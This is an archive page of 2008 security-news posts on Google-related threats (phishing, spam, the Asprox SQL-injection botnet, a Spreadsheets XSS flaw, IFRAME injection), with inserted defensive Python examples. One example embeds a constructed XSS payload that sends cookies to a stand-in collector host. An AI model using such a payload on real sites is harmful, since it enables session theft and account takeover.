CyberInsecure.com

Daily cyber threats and internet security news alerts

Archive for the ‘Google’ Category

Columbia University Students Private Details Available On Google-Hosted Website For 16 Months

Monday, June 16th, 2008

Private details and social security numbers of 5,000 Columbia University students had been searchable online for the last 16 months. Students received an e-mail message on Tuesday night from the vice president of student auxiliary and business services, Scott Wright, explaining that in February 2007, a student employee had posted a database of students’ housing information on a Google-hosted Web site.

On June 3, Columbia University’s Housing and Dining department was informed that one archival database file containing housing information of current and former undergraduate students had been posted on a Google-hosted Web site. It appears that the file was inadvertently posted by a former student employee in February 2007. At the university’s request, Google immediately removed the file.

Columbia Public Safety investigators have concluded that this security breach was unintentional. Columbia University would not identify the student, saying only that the person had worked in the university’s housing office. A similar leak occurred in April 2007, when the university noticed that three databases containing students’ addresses and Social Security numbers were online.

Several students created an online petition and posted it to the main campus Web log, demanding that the university investigate the former employee and issue a report explaining how security will be increased. The petition address is www.petitiononline.com/breach/petition.html.

No financial data was included in the file in question, and there is no evidence of identity theft. The phone number for questions or comments is 1 (888) 882-7331; e-mail: studentservices-assist@columbia.edu.


Google Docs Abused In Latest Spam Technique

Monday, May 26th, 2008

Spammers have adopted Google Docs to borrow the credibility of Google’s domain, since spam filters will not flag a Google link as spam. According to MessageLabs, the technique is used to get around the blocking and blacklisting of spam hosting domains.

Since hosted Google Docs are served from docs.google.com, it would be possible to block that hostname, but the platform has so many users that doing so would block a large amount of legitimate mail. URL block lists are a very popular way to stop spam, but a hostname with “google” in it is never going to be listed because of all its legitimate uses.

Sending attachments such as JPGs or Word .doc files has proven less successful than simply sending the user a link, which is why this misuse of Google Docs may become more popular. Spam carrying only a URL is not foolproof either: spam filters have long checked the links in e-mail and blocked messages based on suspicious Web addresses.

The way around a link that cannot be blocked is to judge the message by its sender rather than its content, which is hard for many companies. Unless they can filter on the source IP, the only remaining signal is the reputation of the sending IP.

There is also a limiting factor in this technique: a Google Docs page is far less dynamic than an arbitrary HTML page. The best a spammer can do is put links in the page to get victims to click through to another site; raw HTML cannot be embedded, so no malicious IFRAME can be added and no malicious JavaScript can run. Another obstacle is the need to create a large number of Google accounts, which is not easy because Google uses a CAPTCHA to stop automated account creation.

MessageLabs found an example, a typical sexual-enhancement advertisement, that asked the recipient to click a link to a Google Docs page. That page in turn carried more links to sites selling Viagra. The page was reported to Google as spam on May 8 but is still live.

So far MessageLabs has not seen large volumes from this method, but Google’s Blogspot blogging service is frequently used by spammers, so the spammers may just be getting started. Spammers still use Blogspot as an intermediate drop page, so they may refine this method a little and stick with it, unless it fails to meet their expectations and they drop it.
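The filtering logic the two paragraphs above describe, as an added example (this is not code from the original post or from MessageLabs): a domain-level block list cannot touch docs.google.com, so the filter blocks individual reported documents by host and path instead, and when a message only links to a shared hosting domain it weighs the reputation of the relay IP that delivered it. Every list entry, IP address and message below is constructed for the demonstration.

```python
"""Link-based spam filtering when the link lives on a shared hosting domain.

Added example, not part of the original post or of any MessageLabs tool.
It shows why a domain-level URL block list cannot stop links to
docs.google.com, and the two signals a filter can use instead:
  1. block individual reported documents by host + path, not by host;
  2. when a message only links to a shared hosting domain, weigh the
     reputation of the relay IP that delivered it.
Every list entry, IP address and message below is constructed.
"""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Domains used for nothing but spam: safe to block outright (constructed).
BLOCKED_DOMAINS = {"cheap-pills-example.invalid"}

# Hosts with too many legitimate users to block at the domain level.
SHARED_HOSTING = {"docs.google.com", "spreadsheets.google.com"}

# Individual documents on shared hosts that have been reported as spam,
# keyed by (host, path-and-query) so one bad document does not block the host.
BLOCKED_PATHS = {("docs.google.com", "/Doc?id=constructed-spam-doc-1")}

# Relay reputation, 0.0 (clean) to 1.0 (known spam source); constructed.
IP_REPUTATION = {"192.0.2.10": 0.05, "192.0.2.50": 0.60, "192.0.2.77": 0.92}
IP_BLOCK_THRESHOLD = 0.8     # block on reputation alone
SHARED_LINK_THRESHOLD = 0.5  # block when combined with a shared-host link


def extract_urls(body: str) -> list:
    """Pull URLs out of a message body, dropping trailing punctuation."""
    return [u.rstrip(".,;:)") for u in URL_RE.findall(body)]


def url_verdict(url: str) -> str:
    """Return 'block', 'shared' or 'clean' for one URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path + ("?" + parts.query if parts.query else "")
    if host in BLOCKED_DOMAINS:
        return "block"
    if host in SHARED_HOSTING:
        # Only an exact reported document is blocked; the host itself is not.
        return "block" if (host, path) in BLOCKED_PATHS else "shared"
    return "clean"


def classify(sender_ip: str, body: str) -> str:
    """Return 'spam' or 'deliver' for a message from the given relay IP."""
    verdicts = {url_verdict(u) for u in extract_urls(body)}
    if "block" in verdicts:
        return "spam"
    reputation = IP_REPUTATION.get(sender_ip, 0.0)
    if reputation >= IP_BLOCK_THRESHOLD:
        return "spam"
    # A link on a shared host is not evidence by itself; it only tips the
    # balance when the relay already has a poor reputation.
    if "shared" in verdicts and reputation >= SHARED_LINK_THRESHOLD:
        return "spam"
    return "deliver"
```

The thresholds are illustrative; the point is the ordering of the checks: a reported document path is a hard block, a shared-host link on its own never is, and the relay's reputation decides the grey area.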

There is no Google response available on this subject at this moment.


Phishing Botnet Expands By SQL Injecting Websites Found In Google

Wednesday, May 14th, 2008

The Asprox botnet, which specializes in sending phishing spam, is now using a SQL injection attack tool designed to hack legitimate websites, a move meant to add more hijacked PCs to its collection. According to SecureWorks, the botnet is pushing an update to the infected PCs it controls by sending an executable file, msscntr32.exe, that installs as a Windows service called “Microsoft Security Center Extension”. In reality, the file is a SQL injection attack tool.

After the Asprox botnet seeds its bots with the msscntr32.exe file, the attack tool launches and uses Google’s search engine to find potentially vulnerable website pages. It then hits those pages with a SQL-injection attack and, if successful, plants a malicious IFRAME on the site. Visitors are redirected through a series of malware-hosting servers that try one or more exploits to infect their PC. If that works, a Trojan horse is downloaded and installed on the PC, adding it to the Asprox botnet; those compromised PCs are then used to spew more phishing spam.

So far, Asprox zombies have infected only about 1,000 pages, which carry JavaScript pointing to sites including direct84.com and adword71.com. In addition to silently feeding end users Asprox malware, the poisoned pages also push malware for a competing botnet known as Cutwail. The sites also try to install WinFixer, a notorious program that falsely tells users they are infected with malware in an attempt to trick them into buying bogus anti-malware products.

Security vendors, including F-Secure Corp. and Symantec Corp., have also uncovered evidence of new waves of SQL-injection attacks. Those firms have been pinning responsibility on Chinese hackers who are compromising legitimate sites to spread malware to steal game passwords.

SQL injection attacks have become widespread as criminals increasingly target legitimate websites, figure out a way to hack them, then plant IFRAMEs on those sites to redirect users to malicious servers. Those servers silently attack visitors’ PCs, often trying multiple exploits, and if one works, they download additional code to the machine to hijack it from its rightful owner and add it to an army of infected systems.

Some analysts have mistakenly concluded that the SQL injection tool is using worm-like tactics. According to SecureWorks, the tool does not spread on its own but relies on the Asprox botnet to propagate to new hosts.


Another Google Adwords Phishing Attack In Progress

Saturday, May 3rd, 2008

Google AdWords account holders are being targeted by criminals who trick them into handing over credit card information using a URL spoof that has gained popularity in recent weeks.

The scam follows a traditional attack route: spam e-mails are sent to random Internet addresses in the hope of finding users who have purchased AdWords. The e-mail claims that the user’s account payment has failed and asks them to “update payment information”, a transparent tactic by today’s standards.

A proper-looking link, http://adwords.google.com/select/login, is embedded in the e-mail; as text it is a correct Google login address. However, it actually leads to http://www.adwords.google.com.********.cn/select/Login, an obfuscated address in which google.com is merely a subdomain label of a .cn domain, and which resolves to a site associated with IPs in Germany, Romania, and the Czech Republic.

The site is a good copy of the real Google AdWords site and appears to let users log in with their real account details; naturally, any account details will work. Entering payment details results in that information being posted over an SSL connection to a remote server, after which the account is hijacked.

The attack has been publicized by security software company Trend Micro, but the disarmingly simple scam is widespread enough to have reached ordinary users in recent days. It bears a strong resemblance to a near-identical campaign launched a few weeks ago by Chinese criminals.
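The check a mail client or a careful user should make on such a link, as an added example (not code from the original post or from Trend Micro): compare the host the link text displays with the host the href really points at, and reduce the real host to its registrable domain. The attacker’s domain is redacted in the post, so “attacker-example.cn” stands in for it; the small suffix table is a stand-in for the Public Suffix List and only covers the suffixes the example needs.

```python
"""Detecting a spoofed link of the kind used in the AdWords phishing mail.

Added example, not part of the original post or of any Trend Micro tool.
The attacker's domain is redacted in the post, so 'attacker-example.cn'
stands in for it. TWO_LABEL_SUFFIXES is a small stand-in for the Public
Suffix List, covering only the suffixes needed here.
"""
from urllib.parse import urlsplit

# Public suffixes that take two labels, so the registrable domain is three.
TWO_LABEL_SUFFIXES = {"com.cn", "co.uk", "com.au", "co.jp"}


def registrable_domain(host: str) -> str:
    """Reduce a hostname to the part a registrant actually controls."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def analyse_link(text_url: str, href: str, expected_domain: str = "google.com") -> dict:
    """Compare the host shown in the link text with the host the href
    really targets, and check where the real host is registered."""
    shown = (urlsplit(text_url).hostname or "").lower()
    real = (urlsplit(href).hostname or "").lower()
    real_reg = registrable_domain(real)
    findings = []
    if registrable_domain(shown) != real_reg:
        findings.append("link text and href are on different registrable domains")
    if real_reg != expected_domain and expected_domain in real:
        # google.com appears in the host, but only as a subdomain label of
        # someone else's domain: the www.adwords.google.com.<evil>.cn trick
        findings.append(f"{expected_domain} is a subdomain label of {real_reg}")
    return {"shown": shown, "real": real, "registrable": real_reg, "findings": findings}


def is_safe_link(text_url: str, href: str, expected_domain: str = "google.com") -> bool:
    """True only when the href really lands on the expected domain."""
    return not analyse_link(text_url, href, expected_domain)["findings"]
```

Reading the host from right to left is the whole trick: whatever appears before the registrable domain is under the attacker’s control, however familiar it looks.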

As common as “account update” attacks have become, the spoofed URL is still the key to reeling in victims. Criminals seem to have realized that users are paying more attention to such details.


Fake Meeting Invitations Spam In Google And Outlook Calendars

Saturday, May 3rd, 2008

An increasing number of spam e-mails are being sent disguised as meeting invitations. Spammers are using the meeting invite features of both Google Calendar and Microsoft Outlook to send messages advertising, for example, the latest designer watches and prescription drugs. The messages are recognized and displayed by many mail clients as proper meeting invitations and actually get added to the calendar of the user who receives the spam unless they specifically decline the request. It is becoming more and more common and has recently been reported by Security Fix at The Washington Post, Websense and ISC.

In some applications with default settings, this kind of spam is processed in ways that allow a spammer, or potentially a malicious attacker, to deliver content by routes that are not commonly seen or as easily recognized by users as junk or malicious. Many users have learned that it is bad to click on links in e-mails, but they are told far less often not to click on links in meeting requests or in the body of the meetings in their calendars.

While some mail systems, such as GMail/Google Calendar and a compatible version of Outlook, handle meeting requests as a message type specific to meetings, many handle them as normal e-mails carrying a specially formatted attachment that follows the iCalendar standard. Applications that support such attachments are common: most major e-mail clients with some form of calendar integration support them in some way, including Microsoft Outlook, Mozilla Calendar (as well as Sunbird and Lightning) and Apple’s iCal, and some web-based clients, like GMail, support them too. By the standard, these files are plain text, UTF-8 encoded, with an extension such as .ical or .ics, though this varies from one implementation to another. With Outlook, the problem seems to originate in the program itself: when Outlook receives a meeting invite, it blocks off the requested time period on a provisional basis until the recipient either accepts or declines the invite.
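What a client that treated meeting requests as untrusted input would do with such an attachment, as an added example (not code from the original post or from any calendar product): parse the text/calendar part of the incoming message, pull the organizer and any links out of the event, and only add the invitation automatically when the organizer is on a trusted domain and every link stays on that domain; anything else is held for the user to respond to rather than placed on the calendar. The trusted-domain list and the sample messages are constructed.

```python
"""Treating a meeting request as untrusted input before it reaches the calendar.

Added example, not part of the original post or of any calendar product.
It parses the text/calendar part of an incoming message, pulls the event's
organizer and any links from its description, and decides whether the
invitation may be added to the calendar automatically or must wait for the
user to respond. The trusted-domain list and both sample messages are
constructed.
"""
import email
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# Organizers whose invitations may be added without a response (constructed).
TRUSTED_ORGANIZER_DOMAINS = {"example.com"}


def unfold(ics_text: str) -> list:
    """Undo RFC 5545 line folding: a line starting with a space or tab
    continues the previous line."""
    lines = []
    for raw in ics_text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_vevent(ics_text: str) -> dict:
    """Return the properties of the first VEVENT as a name -> value dict."""
    props, in_event = {}, False
    for line in unfold(ics_text):
        if line == "BEGIN:VEVENT":
            in_event = True
            continue
        if line == "END:VEVENT":
            break
        if not in_event or ":" not in line:
            continue
        name_and_params, value = line.split(":", 1)
        name = name_and_params.split(";", 1)[0].upper()   # drop parameters
        props[name] = value.replace("\\n", "\n").replace("\\,", ",")
    return props


def calendar_part(raw_message: str):
    """Return the decoded text/calendar body of a message, or None."""
    msg = email.message_from_string(raw_message)
    for part in msg.walk():
        if part.get_content_type() == "text/calendar":
            return part.get_payload(decode=True).decode("utf-8")
    return None


def on_same_domain(url: str, domain: str) -> bool:
    host = (urlsplit(url).hostname or "").lower()
    return bool(domain) and (host == domain or host.endswith("." + domain))


def invite_policy(raw_message: str) -> str:
    """'auto-add', 'hold' (show as pending, never tentative) or 'not-an-invite'."""
    ics = calendar_part(raw_message)
    if ics is None:
        return "not-an-invite"
    event = parse_vevent(ics)
    organizer = event.get("ORGANIZER", "").lower()
    org_domain = organizer.rsplit("@", 1)[-1] if "@" in organizer else ""
    links = URL_RE.findall(event.get("DESCRIPTION", "") + " " + event.get("URL", ""))
    foreign = [u for u in links if not on_same_domain(u, org_domain)]
    if org_domain in TRUSTED_ORGANIZER_DOMAINS and not foreign:
        return "auto-add"
    return "hold"


def make_invite(organizer: str, description: str) -> str:
    """Build a constructed one-part iCalendar REQUEST message for testing."""
    return (
        f"From: {organizer}\r\nTo: bob@example.com\r\nSubject: Meeting\r\n"
        "MIME-Version: 1.0\r\n"
        "Content-Type: text/calendar; method=REQUEST; charset=UTF-8\r\n\r\n"
        "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nMETHOD:REQUEST\r\nBEGIN:VEVENT\r\n"
        "UID:constructed-1@example.com\r\nDTSTART:20080503T140000Z\r\n"
        f"SUMMARY:Sync\r\nORGANIZER;CN=Organizer:mailto:{organizer}\r\n"
        f"DESCRIPTION:{description}\r\nEND:VEVENT\r\nEND:VCALENDAR\r\n"
    )
```

The “hold” outcome is the important one: it is the equivalent of the Google Calendar and Outlook settings described below, applied per message rather than globally, and it keeps the spammer’s links off the calendar where users are least suspicious of them.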

Google Calendar users can set it to show only those events that they have created or accepted. According to Google, here’s how to do that:

1. Click on “Settings” at the top of any Google Calendar page
2. Select the “General” tab if it isn’t selected already.
3. In the “Automatically add invitations to my calendar” section,
select “No, only show invitations to which I have responded.”
4. Click on “Save.”

Google also provides a reporting link through which Calendar users can report calendar spam.

To stop the automatic addition of a meeting when the e-mail is received in Outlook, clear the check box for “Process requests and responses on arrival” as follows:

1. On the Tools menu, click Options.
2. Click Email Options.
3. Click Tracking Options.
4. Click to clear the “Process requests and responses on arrival” check box.

This still doesn’t stop the creation of a tentative meeting if the e-mail is opened or viewed in the reading (preview) pane.

There are many other applications that use these invitations. Users should be aware that this is possible regardless of which applications they use, since any of them could be spammed or attacked in this way. Just because users see a meeting request rather than an e-mail does not mean it is any safer to click on its links.


Google’s Blogger CAPTCHA Under Automated Registrations Attack

Saturday, April 26th, 2008

Spammers have recently targeted Google’s well-known blog publishing system Blogger (Blogspot), following earlier anti-CAPTCHA attacks on Microsoft’s Live Mail, Google’s Gmail and Microsoft’s Live Hotmail.

The automated bots not only sign up and create Blogger accounts (using spammer-supplied account credentials) but also use those accounts as redirectors and doorway pages for advertising the spammers’ products and services. In the current attack, accounts are registered through the anti-CAPTCHA operation, and a few lines of script placed in the blog refresh the page and so redirect the visitor to the actual spam domain.

For spammers this approach has several advantages. Sign-up is free, and the accounts can be used as redirectors or doorway pages to the spammers’ own domain(s); spammers include these redirecting accounts in their campaigns instead of their actual spam domains, and use the tactic to defeat a range of anti-spam services.
The same redirecting or doorway accounts can be reused across multiple mass-mailing campaigns.
A further advantage is that such accounts are hard to track down, since millions of users worldwide use Google’s Blogger service regularly.

The automated process is built of two stages. First, predefined instructions from the CAPTCHA-breaking host are injected onto a bot-infected (victim) machine; the instructions serve as templates, with varying account credentials and the spam-domain redirect script. Second, the infected machine performs its tasks according to those instructions. Spammers are trying to improve their anti-CAPTCHA techniques, and the results of validation checks are sent to their e-mail addresses.

These accounts could be used by the spammers at any time for a variety of social-engineering attacks, a trend that has been increasingly common with various popular Web 2.0 sites.


Google Fixes Cookie Stealing Vulnerability

Tuesday, April 15th, 2008

Security researchers have picked apart a flaw in Google Spreadsheets that allows cookie stealing. The cross-site scripting vulnerability lets an attacker use stolen cookies to access any Google service the victim has registered for, including the victim’s Gmail account. Google has now plugged the vulnerability, discovered by security researcher Billy Rios. A Google cookie is valid across all of Google’s subdomains, a convenience that greatly enhances the potential for mischief.

This particular XSS vulnerability on Google’s domain takes advantage of how IE determines the content type of an HTTP response returned by the server: rather than trusting the declared Content-Type header, IE inspects the body. Other browsers have had their own problems handling content-type headers, but this particular vulnerability is limited to IE.

Rios created a spreadsheet containing HTML and a string of JavaScript that reads the viewer’s cookie. He then saved the spreadsheet and generated a link that served it as a text-based CSV file, which IE mistakenly interpreted as HTML because of the tags in the content.

Anyone viewing this doctored spreadsheet would hand over their cookies to Rios, or to an attacker using the same trick. Google has now fixed the problem by rendering crafted table content as text rather than HTML.
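The server-side defence for a CSV export of user-controlled cells, as an added example (this is not Google’s code or the actual fix): the response is built twice, once as the vulnerable plain text/csv download and once with the headers that stop a browser from second-guessing the declared type, and a small model of a content-sniffing browser shows which version it would render as HTML. The sniffing model is a simplification of the IE heuristic the post describes (look for HTML tags near the start of the body); the rows are constructed.

```python
"""Serving a CSV export of user-controlled cells so that a content-sniffing
browser cannot treat it as HTML.

Added example; this is not Google's code or the original fix. 'sniffs_as_html'
is a simplified model of the IE heuristic the post describes (look for HTML
tags near the start of the body instead of trusting Content-Type); the real
algorithm has more rules. The rows are constructed.
"""
import csv
import io

SNIFF_WINDOW = 256   # bytes a sniffing browser inspects (model assumption)
HTML_MARKERS = (b"<!doctype", b"<html", b"<head", b"<body", b"<script",
                b"<title", b"<table", b"<a ", b"<img", b"<iframe")


def build_csv(rows) -> bytes:
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\r\n").writerows(rows)
    return buf.getvalue().encode("utf-8")


def export_response(rows, hardened: bool):
    """Return (headers, body) for a CSV download, with or without the
    defences against content sniffing."""
    headers = {"Content-Type": "text/csv; charset=utf-8"}
    if hardened:
        # Tell the browser the declared type is authoritative ...
        headers["X-Content-Type-Options"] = "nosniff"
        # ... and never render the file inline in a browsing context, so
        # even a browser that ignores nosniff downloads it instead.
        headers["Content-Disposition"] = 'attachment; filename="export.csv"'
    return headers, build_csv(rows)


def sniffs_as_html(headers, body: bytes) -> bool:
    """Model of a sniffing browser deciding whether to render as HTML."""
    if headers.get("X-Content-Type-Options", "").lower() == "nosniff":
        return False
    if headers.get("Content-Disposition", "").lower().startswith("attachment"):
        return False
    head = body[:SNIFF_WINDOW].lower()
    return any(marker in head for marker in HTML_MARKERS)


# Constructed spreadsheet: the first cell is attacker-controlled content.
MALICIOUS_ROWS = [
    ["<html><script>document.location='http://collector-example.invalid/?c='"
     "+document.cookie</script></html>", "1"],
    ["ordinary text", "2"],
]
```

Escaping the cells does not help here, because the browser is not parsing CSV at all; the fix has to be in the headers (or, as Google did for the rendered view, in treating the content strictly as text), and serving the export from a domain that carries no session cookie would limit the damage further.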


Google To Open Suspect Orkut Albums To Brazil Police

Saturday, April 12th, 2008

Google may allow Brazilian police to access 3,261 private photo albums on the social networking website Orkut that may contain child pornography. The move is part of a strategy announced by the head of the company in Brazil, Alexandre Hohagen, to a Senate committee set up to investigate paedophilia cases in the country. In the last two years nearly 90 percent of the 56,000 complaints in Brazil about Internet-based paedophilia were linked to the website. Until September 2007, all requests for information about users suspected of crimes such as racism or paedophilia were sent to Google in the US to be examined.

Every time abuse is reported within Orkut, the administrators must immediately delete the images, which destroys the evidence. The company is working on collaboration between the Brazilian authorities and the US organization.

The private photo albums, considered by some a safe haven for criminals, were introduced in November 2007 and allow users to block access to their pictures by anyone outside their direct network. They were created to protect the privacy of users who do not want personal pictures seen by strangers, and the majority of users use them for exactly that. Google apparently has no plans to disable the option.


Gmail Being Blocked By Some Anti-Spam Vendors

Monday, April 7th, 2008

Thousands of users have recently had problems receiving e-mail from Gmail users. Over the past month, major anti-spam vendors have had to scrutinize Gmail in a way they never had to before, and the result is reduced delivery performance and sometimes outright blocking of Gmail. Some messaging hosts are being instructed to reject SMTP connections from Google.

The reason is the defeat of the Gmail CAPTCHA announced in February. According to sources in the anti-spam industry, the result has been a marked increase in spam originating from Gmail SMTP servers; some say the increase started even earlier.

A support analyst with MessageLabs, a major provider of software-as-a-service anti-spam filtering, said that “some spammers have hacked into the Gmail captcha system, and were able to relay spams appearing to come from Googlemail’s IP addresses. This has caused many IPs of theirs to appear to be sources of spam.” For their customers, this means a decrease in performance. “We have a traffic-shaping system that throttles IPs that we believe to appear to be a source of spam. The result is that for the past couple of days we have been seeing issues like this with Gmail,” the analyst concluded.

Gmail has sent out a lot of spam recently, and its relays are registering on traffic-shaping systems. When spam is sent out through a Gmail relay, that relay can sometimes be blocked completely, causing problems for thousands of legitimate Gmail users, so MessageLabs has to throttle only the SMTP relays that are actually spamming.

Blocking has been verified, as well as extremely long delivery delays, from four hours up to 24 hours. The problem is maddening because not all Gmail relays are affected: you may receive some e-mail on time while other messages never arrive. Even some corporate Google-hosted e-mail has been blocked.

Postini’s anti-spam filtering service (Postini was acquired by Google last year) does not appear to be affected at this time. Purely client-side filters such as SpamBayes are also unaffected.

The damage currently appears limited to certain SaaS filtering solutions, such as MessageLabs and Antigen. There are unconfirmed reports concerning Microsoft as well. A source at another anti-spam company, who wished to remain anonymous, said that Google can expect more problems if the CAPTCHA crack cannot be stopped; his product team was already working on the issue but was unsure how best to handle it.


Hacked Blog Spam Pages Promoted In Google News

Friday, April 4th, 2008

Google News search results are currently polluted with spam pages from a hacked authority blog (possibly more than one). A simple search for “migraine” in Google News returns about 120 results linking to “cialis” spam from a folder of specially generated spam pages on blog.oup.com (the Oxford University Press blog). The results are supposedly sorted by “relevance”. Do not click on these search results: the pages may contain exploits that can infect your PC through the browser (usually Internet Explorer).

It seems that not only was the Oxford University Press blog hacked and spam pages added, but the Google News mechanism indexed those pages without verification because they are hosted on a trusted news domain, oup.com. The cause is, of course, an old WordPress version with a vulnerability that was exploited.

Other keywords trigger the same response from Google News, among them “osteoarthritis”, “anxiety”, “osteoporosis”, “blood pressure”, “viagra” and many more.

A regular Google search for blog.oup.com shows some interesting results as well. The folder /wp-content/themes/default/images, which normally contains the blog’s pictures, currently contains an extra folder called “ph” in which all the spam pages are located.

The spam pages promote a “Trusted Pharmacy”, and the trick obviously worked on Google News, since the pages were added straight into the news search results. Google’s filters did not pick up the infected blog because the blog is a verified news source and, most likely, all content from the domain blog.oup.com is trusted. Not only that, the spam pages were somehow categorized as “relevant” to the searches in question.

There seems to be a need for a ranking mechanism that takes into account not only the reputation of a source but also verifies that the source has not been hacked and that spam or infected pages are not being injected into Google. Our trust in Google’s filtered, “safe to visit” News results becomes more and more important. Unlike web search, whose index can be built, filtered and updated over the course of months, the news index has to be extremely fresh; algorithms like PageRank therefore cannot function properly, and that is the reason no further verification is done on websites once they are approved as trusted.

UPDATE: A senior customer service representative at Oxford University Press has opened a ticket with their systems support group to investigate. Hopefully the hacked blog will be cleaned up by Oxford University Press soon.
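A check a site owner could run to catch exactly this kind of planted folder, as an added example (not part of the original post): a WordPress theme’s images directory should contain nothing but image files, so the audit flags any subdirectory, any PHP or HTML file, and any file whose image extension does not match its contents. The directory tree is constructed in a temporary folder to resemble the layout described above.

```python
"""Finding a doorway directory planted under a theme's image folder, like the
"ph" folder discovered under /wp-content/themes/default/images on the hacked
blog.

Added example, not part of the original post. It builds a constructed copy
of such a tree in a temporary directory and audits the images folder, which
on a clean install should hold image files only: no subdirectories, no
PHP or HTML, and nothing that carries an image extension but is not an image.
"""
import tempfile
from pathlib import Path

IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
WEB_EXECUTABLE = {".php", ".phtml", ".php5", ".html", ".htm", ".js"}
# File signatures for the image types we accept.
IMAGE_MAGIC = (b"\x89PNG", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")


def looks_like_image(path: Path) -> bool:
    with open(path, "rb") as f:
        head = f.read(6)
    return any(head.startswith(magic) for magic in IMAGE_MAGIC)


def audit_images_dir(images_dir) -> list:
    """Return (finding, relative-path) pairs for everything that does not
    belong in an images-only directory."""
    root = Path(images_dir)
    findings = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        suffix = path.suffix.lower()
        if path.is_dir():
            findings.append(("unexpected-subdir", rel))
        elif suffix in WEB_EXECUTABLE:
            findings.append(("web-executable", rel))
        elif suffix not in IMAGE_EXTENSIONS:
            findings.append(("non-image-extension", rel))
        elif not looks_like_image(path):
            # e.g. a PHP file renamed to .gif to survive a casual look
            findings.append(("image-extension-but-not-image", rel))
    return findings


def build_demo_tree() -> Path:
    """Constructed wp-content tree resembling the hacked blog's layout."""
    images = Path(tempfile.mkdtemp()) / "wp-content" / "themes" / "default" / "images"
    images.mkdir(parents=True)
    (images / "header.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    (images / "logo.gif").write_text("<?php /* constructed stand-in for a script behind an image name */ ?>")
    ph = images / "ph"
    ph.mkdir()
    (ph / "index.php").write_text("<?php /* constructed doorway generator */ ?>")
    (ph / "cialis.html").write_text("<html><body>Trusted Pharmacy</body></html>")
    return images
```

Run against the real document root this is a cheap cron job; the same rule (“only the file types this directory is for”) can be enforced in the web server configuration so that a planted .php under images/ is never executed even if it gets there.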


Massive IFRAME Search Results Attack

Friday, March 28th, 2008

A massive IFRAME injection attack, which started last week, is slowly turning into a large-scale audit of web application vulnerabilities at high-profile sites. Last week Symantec rated the attack as medium risk, and StopBadware and US-CERT issued warnings about the incident. After another week of monitoring the campaign, the latest malware and the sites targeted, the campaign is still up and running, poisoning what looks like over a million search queries with IFRAMEs whose loading depends entirely on each site’s web application security practices.

The main IPs within the IFRAMEs, which act as redirection points to the newly introduced rogue software and malware, remain the same and are still active. High-profile websites have been successfully injected with IFRAMEs forwarding to rogue security software and Zlob malware variants. Some of the websites attacked:

USAToday.com, ABCNews.com, News.com, Sears.com, Circuitcity.com, Target.com, Packard Bell.com, Walmart.com, Forbes.com, Ugo.com, Bartleby.com, Linkedwords.com, Rediff.com, MiamiHerald.com, Bloomingdales.com, PatentStorm.us, WebShots.com, Allwords.com, Blogdigger.com, Epinions.com, Buyersindex.com, Jcpenney.com, Nakido.com, Uvm.edu, hobbes.nmsu.edu, jurist.law.pitt.edu, boisestate.edu

The number and importance of the sites has increased. Google appears to be filtering the search results even though the malicious parties may already have injected the IFRAMEs, in an attempt to undermine the campaign; in response, new malware and fake codecs are being introduced under new domain names, and a couple of new domains have appeared within the IFRAMEs themselves.

Google is actively filtering the results and removing cached pages for a number of domains. The attack, which started two weeks ago, is continuing: the main IPs behind the IFRAMEs are still active, new pieces of malware and rogue software are being introduced, hosting is still courtesy of the RBN, and we are definitely going to see many other sites with high page ranks targeted by a single massive SEO poisoning combined with IFRAME injection.

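A scanner for the injection patterns described in this post, in the Asprox post (pages planted with IFRAMEs and JavaScript pointing to direct84.com and adword71.com) and in the Blogger doorway post (refresh-based redirects), as an added example that is not code from any of the posts or from a vendor tool: it walks a page’s HTML and reports hidden or off-site IFRAMEs, script tags loading from another domain, and meta-refresh or JavaScript redirects. The sample page is constructed; direct84.com and adword71.com are the hosts named in the Asprox post, every other host is a placeholder.

```python
"""Scanning a site's HTML for the injection patterns described in the Asprox,
Blogger doorway and massive-IFRAME posts: hidden or off-site IFRAMEs,
<script src> tags loading from other domains, and the meta-refresh or
JavaScript redirects that doorway pages use.

Added example, not taken from any of the posts or from a vendor tool. The
sample page is constructed; direct84.com and adword71.com are the hosts named
in the Asprox post, every other host is a placeholder.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

REDIRECT_RE = re.compile(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)")
META_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\" ]+)", re.IGNORECASE)


class InjectionScanner(HTMLParser):
    def __init__(self, site_host, known_bad=()):
        super().__init__()
        self.site_host = site_host.lower()
        self.known_bad = {h.lower() for h in known_bad}
        self.findings = []          # (kind, severity, host)
        self._in_script = False
        self._script_text = []

    def _host(self, url):
        return (urlsplit(url).hostname or "").lower()

    def _external(self, url):
        host = self._host(url)
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def _flag(self, kind, url):
        host = self._host(url)
        self.findings.append((kind, "known-bad" if host in self.known_bad else "external", host))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden or self._external(a.get("src", "")):
                self._flag("hidden-iframe" if hidden else "iframe", a.get("src", ""))
        elif tag == "script":
            self._in_script = True
            if self._external(a.get("src", "")):
                self._flag("external-script", a["src"])
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL_RE.search(a.get("content", ""))
            if m:
                self._flag("meta-refresh", m.group(1))

    def handle_data(self, data):
        if self._in_script:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            m = REDIRECT_RE.search("".join(self._script_text))
            self._script_text = []
            if m:
                self._flag("script-redirect", m.group(1))


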